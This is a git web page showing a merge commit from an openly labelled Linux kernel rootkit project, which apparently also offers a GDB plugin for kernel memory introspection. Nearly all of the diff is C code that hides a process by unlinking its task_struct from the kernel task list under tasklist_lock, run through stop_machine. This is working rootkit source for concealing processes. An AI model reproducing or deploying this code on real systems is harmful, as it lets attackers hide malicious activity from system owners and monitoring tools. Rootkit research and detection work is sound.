linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 5ac46d2dc56176b04b0825c6253f072638b27ccb
parent b303c8d5268297ee642f012fa81b4c5172ad21b4
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Mon, 25 Jan 2021 12:46:23 +0100

Merge pull request #7 from deurzen/feat/dkom

Feat/dkom
Diffstat:

Mrootkit/.gitignore | 1+


Mrootkit/src/pidhide.c | 42++++++++++++++++++++++++++++++++++++++++++


2 files changed, 43 insertions(+), 0 deletions(-)

diff --git a/rootkit/.gitignore b/rootkit/.gitignore
@@ -15,3 +15,4 @@
 /rkctl
 /tags
 /*.o.d
+/src/*.o.d
diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c
@@ -1,6 +1,20 @@
 #include <linux/slab.h>
 #include <linux/pid.h>
+#include <linux/sched.h>
+#include <linux/proc_fs.h>
+#include <linux/sched/task.h>
 
+#include <linux/stop_machine.h>
+
+#include <linux/fs.h>
+#include <linux/fdtable.h>
+#include <linux/slab.h>
+#include <linux/fs_struct.h>
+#include <linux/pid.h>
+#include <linux/delay.h>
+#include <linux/dirent.h>
+
+#include "common.h"
 #include "hook.h"
 #include "pidhide.h"
 
@@ -43,6 +57,23 @@ unhide_pids(void)
     }
 }
 
+int
+del_task_cpu_stopped(void *arg)
+{
+    struct task_struct *ts = (struct task_struct *)arg;
+
+    rwlock_t *rwlock = (rwlock_t *)kallsyms_lookup_name("tasklist_lock");
+
+    if (!ts || !ts->tasks.prev || !ts->tasks.next) {
+        return 0;
+    }
+
+    write_lock_irq(rwlock);
+    list_del(&ts->tasks);
+    write_unlock_irq(rwlock);
+
+    return 0;
+}
 
 void
 hide_pid(pid_t pid)
@@ -64,6 +95,17 @@ hide_pid(pid_t pid)
     }
 
     add_pid_to_list(hidden_pids_tail, pid);
+
+	struct pid* pid_struct;
+    pid_struct = find_get_pid(pid);
+
+	if(pid_struct == NULL)
+		return;
+
+    struct task_struct *ts;
+	ts = pid_task(pid_struct, PIDTYPE_PID);
+
+    stop_machine((cpu_stop_fn_t)del_task_cpu_stopped, (void *)ts, NULL);
 }
 
 void